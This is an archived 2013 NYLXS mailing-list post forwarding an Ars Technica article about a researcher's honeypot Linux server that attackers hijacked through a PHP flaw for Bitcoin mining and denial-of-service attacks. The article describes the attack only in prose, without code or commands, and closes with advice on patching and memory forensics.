Tue Nov 5 17:33:39 2024
EVENTS
 FREE
SOFTWARE
INSTITUTE

POLITICS
JOBS
MEMBERS'
CORNER

MAILING
LIST

NYLXS Mailing Lists and Archives
NYLXS Members have a lot to say and share but we don't keep many secrets. Join the Hangout Mailing List and say your peice.

DATE 2013-12-01

HANGOUT

2024-11-05 | 2024-10-05 | 2024-09-05 | 2024-08-05 | 2024-07-05 | 2024-06-05 | 2024-05-05 | 2024-04-05 | 2024-03-05 | 2024-02-05 | 2024-01-05 | 2023-12-05 | 2023-11-05 | 2023-10-05 | 2023-09-05 | 2023-08-05 | 2023-07-05 | 2023-06-05 | 2023-05-05 | 2023-04-05 | 2023-03-05 | 2023-02-05 | 2023-01-05 | 2022-12-05 | 2022-11-05 | 2022-10-05 | 2022-09-05 | 2022-08-05 | 2022-07-05 | 2022-06-05 | 2022-05-05 | 2022-04-05 | 2022-03-05 | 2022-02-05 | 2022-01-05 | 2021-12-05 | 2021-11-05 | 2021-10-05 | 2021-09-05 | 2021-08-05 | 2021-07-05 | 2021-06-05 | 2021-05-05 | 2021-04-05 | 2021-03-05 | 2021-02-05 | 2021-01-05 | 2020-12-05 | 2020-11-05 | 2020-10-05 | 2020-09-05 | 2020-08-05 | 2020-07-05 | 2020-06-05 | 2020-05-05 | 2020-04-05 | 2020-03-05 | 2020-02-05 | 2020-01-05 | 2019-12-05 | 2019-11-05 | 2019-10-05 | 2019-09-05 | 2019-08-05 | 2019-07-05 | 2019-06-05 | 2019-05-05 | 2019-04-05 | 2019-03-05 | 2019-02-05 | 2019-01-05 | 2018-12-05 | 2018-11-05 | 2018-10-05 | 2018-09-05 | 2018-08-05 | 2018-07-05 | 2018-06-05 | 2018-05-05 | 2018-04-05 | 2018-03-05 | 2018-02-05 | 2018-01-05 | 2017-12-05 | 2017-11-05 | 2017-10-05 | 2017-09-05 | 2017-08-05 | 2017-07-05 | 2017-06-05 | 2017-05-05 | 2017-04-05 | 2017-03-05 | 2017-02-05 | 2017-01-05 | 2016-12-05 | 2016-11-05 | 2016-10-05 | 2016-09-05 | 2016-08-05 | 2016-07-05 | 2016-06-05 | 2016-05-05 | 2016-04-05 | 2016-03-05 | 2016-02-05 | 2016-01-05 | 2015-12-05 | 2015-11-05 | 2015-10-05 | 2015-09-05 | 2015-08-05 | 2015-07-05 | 2015-06-05 | 2015-05-05 | 2015-04-05 | 2015-03-05 | 2015-02-05 | 2015-01-05 | 2014-12-05 | 2014-11-05 | 2014-10-05 | 2014-09-05 | 2014-08-05 | 2014-07-05 | 2014-06-05 | 2014-05-05 | 2014-04-05 | 2014-03-05 | 2014-02-05 | 2014-01-05 | 2013-12-05 | 2013-11-05 | 2013-10-05 | 2013-09-05 | 2013-08-05 | 2013-07-05 | 2013-06-05 | 2013-05-05 | 2013-04-05 | 2013-03-05 | 2013-02-05 | 2013-01-05 | 2012-12-05 | 2012-11-05 | 2012-10-05 | 2012-09-05 | 2012-08-05 | 2012-07-05 | 2012-06-05 | 2012-05-05 | 2012-04-05 | 2012-03-05 | 2012-02-05 | 2012-01-05 | 2011-12-05 | 2011-11-05 | 2011-10-05 | 2011-09-05 | 2011-08-05 | 2011-07-05 | 2011-06-05 | 2011-05-05 | 2011-04-05 | 2011-03-05 | 2011-02-05 | 2011-01-05 | 2010-12-05 | 2010-11-05 | 2010-10-05 | 2010-09-05 | 2010-08-05 | 2010-07-05 | 2010-06-05 | 2010-05-05 | 2010-04-05 | 2010-03-05 | 2010-02-05 | 2010-01-05 | 2009-12-05 | 2009-11-05 | 2009-10-05 | 2009-09-05 | 2009-08-05 | 2009-07-05 | 2009-06-05 | 2009-05-05 | 2009-04-05 | 2009-03-05 | 2009-02-05 | 2009-01-05 | 2008-12-05 | 2008-11-05 | 2008-10-05 | 2008-09-05 | 2008-08-05 | 2008-07-05 | 2008-06-05 | 2008-05-05 | 2008-04-05 | 2008-03-05 | 2008-02-05 | 2008-01-05 | 2007-12-05 | 2007-11-05 | 2007-10-05 | 2007-09-05 | 2007-08-05 | 2007-07-05 | 2007-06-05 | 2007-05-05 | 2007-04-05 | 2007-03-05 | 2007-02-05 | 2007-01-05 | 2006-12-05 | 2006-11-05 | 2006-10-05 | 2006-09-05 | 2006-08-05 | 2006-07-05 | 2006-06-05 | 2006-05-05 | 2006-04-05 | 2006-03-05 | 2006-02-05 | 2006-01-05 | 2005-12-05 | 2005-11-05 | 2005-10-05 | 2005-09-05 | 2005-08-05 | 2005-07-05 | 2005-06-05 | 2005-05-05 | 2005-04-05 | 2005-03-05 | 2005-02-05 | 2005-01-05 | 2004-12-05 | 2004-11-05 | 2004-10-05 | 2004-09-05 | 2004-08-05 | 2004-07-05 | 2004-06-05 | 2004-05-05 | 2004-04-05 | 2004-03-05 | 2004-02-05 | 2004-01-05 | 2003-12-05 | 2003-11-05 | 2003-10-05 | 2003-09-05 | 2003-08-05 | 2003-07-05 | 2003-06-05 | 2003-05-05 | 2003-04-05 | 2003-03-05 | 2003-02-05 | 2003-01-05 | 2002-12-05 | 2002-11-05 | 2002-10-05 | 2002-09-05 | 2002-08-05 | 2002-07-05 | 2002-06-05 | 2002-05-05 | 2002-04-05 | 2002-03-05 | 2002-02-05 | 2002-01-05 | 2001-12-05 | 2001-11-05 | 2001-10-05 | 2001-09-05 | 2001-08-05 | 2001-07-05 | 2001-06-05 | 2001-05-05 | 2001-04-05 | 2001-03-05 | 2001-02-05 | 2001-01-05 | 2000-12-05 | 2000-11-05 | 2000-10-05 | 2000-09-05 | 2000-08-05 | 2000-07-05 | 2000-06-05 | 2000-05-05 | 2000-04-05 | 2000-03-05 | 2000-02-05 | 2000-01-05 | 1999-12-05

Key: Value:

Key: Value:

MESSAGE
DATE 2013-12-17
FROM Ruben Safir
SUBJECT Subject: [NYLXS - HANGOUT] hacked linux boxes
http://arstechnica.com/security/2013/12/anatomy-of-a-hack-what-a-successful-exploit-of-a-linux-server-looks-like/


What a successful exploit of a Linux server looks like
How one box was converted into a Bitcoin-mining, DoS-spewing,
bug-exploiting bot.

by Dan Goodin - Dec 17 2013, 3:15pm EST

Internet Crime
Open Source

42
Enlarge
Andre' DiMino

Like most mainstream operating systems these days, fully patched
installations of Linux provide a level of security that requires a fair
amount of malicious hacking to overcome. Those assurances can be
completely undone by a single unpatched application, as Andre' DiMino
has demonstrated when he documented an Ubuntu machine in his lab being
converted into a Bitcoin-mining, denial-of-service-spewing,
vulnerability-exploiting hostage under the control of attackers.

A security researcher with George Washington University, DiMino noticed
several IP addresses attempting to hijack the Linux server by exploiting
a now-patched PHP flaw that gave attackers the ability to remotely
execute commands on vulnerable machines. DiMino was curious to know what
the people behind the attacks intended to do with his machine, so he set
up a "honeypot" box that, for research purposes, ran an older version of
the Web development language.

The attackers' HTTP POST request contained a variety of commands that in
short order downloaded a Perl script that was disguised as a PDF
document file, executed it, and then deleted it. To ensure success, the
attackers repeated the steps using curl, fetch, lwp-get requests. The
Perl script was programmed to sleep for periods of time, presumably to
prevent administrators from noticing anything amiss. Eventually, the
compromised machine connected to an Internet relay chat channel, where
it downloaded another script and executed it. Then he ran forensic
software and snapped lots of screen shots so everyone could follow
along.

In short order, the machine was running a host of apps installed by the
attackers. Some of them hijacked the server hardware to perform the
mathematical operations required to "mine" Bitcoins and another digital
currency known as Primecoin. The server was also equipped with apps to
perform denial-of-service attacks on other machines and to scan other
machines for known vulnerabilities and exploit them when found.

"Across my honeypots, I'll see dozens of these a day, including Linux
ELF [executable and linkable format] files, perlbots, and vintage
shells," DiMino wrote in a blog post published Tuesday. "While these
injected perl and shell scripts are typically considered the patio gnats
of the Internet, more annoying than anything else, they do have the
potential to cause considerable harm."
Not just for Windows anymore

DiMino's anatomy lesson is a graphic demonstration of recent advances in
exploits for Linux. Once primarily the domain of machines running
Windows, point-and-click exploits are used to commandeer machines so
attackers can use them in online crime schemes. The increased horsepower
and bandwidth available in many Linux servers often makes them more
attractive than personal computers running Microsoft OSes. And as has
always been the case, hijacked bots don't come with expensive
electricity bills, and they often make it easy for criminals to cover
their tracks.

The takeaway from the demonstration is just how important it is for
admins working with any OS to stay on top of security patching. DiMino
counsels admins to go a step further by learning how to actively monitor
network activity on the machines they watch over. His blog post provides
instructions for using the Volatility software framework to perform
forensics on server memory. Among other things, it allows users to
identify remote connections and the processes that initiate them.

"Besides ensuring that Internet facing servers are properly patched and
hardened, knowing how to quickly track such a compromise should be part
of best practices," DiMino wrote.

  1. 2013-12-01 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] Holiday Gathering
  2. 2013-12-01 Elfen Magix <elfen_magix-at-yahoo.com> Re: [NYLXS - HANGOUT] Holiday Gathering
  3. 2013-12-01 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] Holiday Gathering
  4. 2013-12-02 einker <eminker-at-gmail.com> Subject: [NYLXS - HANGOUT] Facebook supports open-source software course
  5. 2013-12-03 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] Holiday Gathering
  6. 2013-12-03 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] Facebook supports open-source software course
  7. 2013-12-03 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] Facebook supports open-source software course
  8. 2013-12-04 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] laptop repair
  9. 2013-12-04 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] Fwd: Hot jobs at HP OMS
  10. 2013-12-04 From: "Paul Robert Marino" <prmarino1-at-gmail.com> Re: [NYLXS - HANGOUT] laptop repair
  11. 2013-12-04 From: "Paul Robert Marino" <prmarino1-at-gmail.com> Re: [NYLXS - HANGOUT] laptop repair
  12. 2013-12-04 einker <eminker-at-gmail.com> Re: [NYLXS - HANGOUT] laptop repair
  13. 2013-12-04 Elfen Magix <elfen_magix-at-yahoo.com> Re: [NYLXS - HANGOUT] laptop repair
  14. 2013-12-04 From: "Paul Robert Marino" <prmarino1-at-gmail.com> Re: [NYLXS - HANGOUT] laptop repair
  15. 2013-12-04 Paul Robert Marino <prmarino1-at-gmail.com> Re: [NYLXS - HANGOUT] laptop repair
  16. 2013-12-04 Elfen Magix <elfen_magix-at-yahoo.com> Re: [NYLXS - HANGOUT] Holiday Gathering
  17. 2013-12-04 einker <eminker-at-gmail.com> Subject: [NYLXS - HANGOUT] double-entendres
  18. 2013-12-04 Elfen Magix <elfen_magix-at-yahoo.com> Re: [NYLXS - HANGOUT] double-entendres
  19. 2013-12-04 From: "Paul Robert Marino" <prmarino1-at-gmail.com> Re: [NYLXS - HANGOUT] Holiday Gathering
  20. 2013-12-04 eminker-at-gmail.com Subject: [NYLXS - HANGOUT] Big Mike Richardson
  21. 2013-12-04 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] Big Mike Richardson
  22. 2013-12-04 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] Holiday Gathering
  23. 2013-12-09 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] Installfest perhaps Thursday?
  24. 2013-12-09 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] laptop repair
  25. 2013-12-10 Elfen Magix <elfen_magix-at-yahoo.com> Re: [NYLXS - HANGOUT] Installfest perhaps Thursday?
  26. 2013-12-11 Elfen Magix <elfen_magix-at-yahoo.com> Subject: [NYLXS - HANGOUT] A Minimum GUI Linux
  27. 2013-12-11 Robert Menes <viewtiful.icchan-at-gmail.com> Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  28. 2013-12-12 Kevin Mark <kevin.mark-at-verizon.net> Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  29. 2013-12-12 eminker-at-gmail.com Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  30. 2013-12-12 From: "Paul Robert Marino" <prmarino1-at-gmail.com> Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  31. 2013-12-12 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  32. 2013-12-14 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  33. 2013-12-14 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] bored
  34. 2013-12-14 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] women are bigots!
  35. 2013-12-14 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] Gimp Magazine
  36. 2013-12-17 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] and in real news this week...
  37. 2013-12-17 Ron Guerin <ron-at-vnetworx.net> Subject: [NYLXS - HANGOUT] Fwd: [luny-talk] Explain Shell!
  38. 2013-12-17 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] hacked linux boxes
  39. 2013-12-17 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] who watches the wathers
  40. 2013-12-20 Ruben Safir <mrbrklyn-at-panix.com> Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  41. 2013-12-20 Elfen Magix <elfen_magix-at-yahoo.com> Re: [NYLXS - HANGOUT] A Minimum GUI Linux
  42. 2013-12-22 Ruben <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] Fwd: [Israel.pm] New job opening - Perl based system <-> SAP-PI integration
  43. 2013-12-23 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] the mta has a message for you
  44. 2013-12-25 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] [info-at-meetup.com: Invitation: Enabling the AMD 64-bit ARM Server
  45. 2013-12-26 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] MS blames Child Abductors for Social Media Addictions
  46. 2013-12-28 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] NSA ruling error
  47. 2013-12-29 Ruben Safir <mrbrklyn-at-panix.com> Subject: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  48. 2013-12-29 From: "Paul Robert Marino" <prmarino1-at-gmail.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  49. 2013-12-29 From: "Paul Robert Marino" <prmarino1-at-gmail.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  50. 2013-12-29 Ruben Safir <mrbrklyn-at-panix.com> Subject: [NYLXS - HANGOUT] Re: [conspire] NSA ruling error
  51. 2013-12-29 Ruben Safir <mrbrklyn-at-panix.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  52. 2013-12-29 Ruben Safir <mrbrklyn-at-panix.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  53. 2013-12-29 Ron Guerin <ron-at-vnetworx.net> Re: [NYLXS - HANGOUT] NSA ruling error
  54. 2013-12-30 Paul Robert Marino <prmarino1-at-gmail.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  55. 2013-12-30 Ruben Safir <mrbrklyn-at-panix.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  56. 2013-12-30 Ron Guerin <ron-at-vnetworx.net> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  57. 2013-12-30 Ruben Safir <mrbrklyn-at-panix.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]
  58. 2013-12-31 Ruben Safir <mrbrklyn-at-panix.com> Re: [rms-at-gnu.org: Re: Fwd: [NYLXS - HANGOUT] NSA ruling error]

NYLXS are Do'ers and the first step of Doing is Joining! Join NYLXS and make a difference in your community today!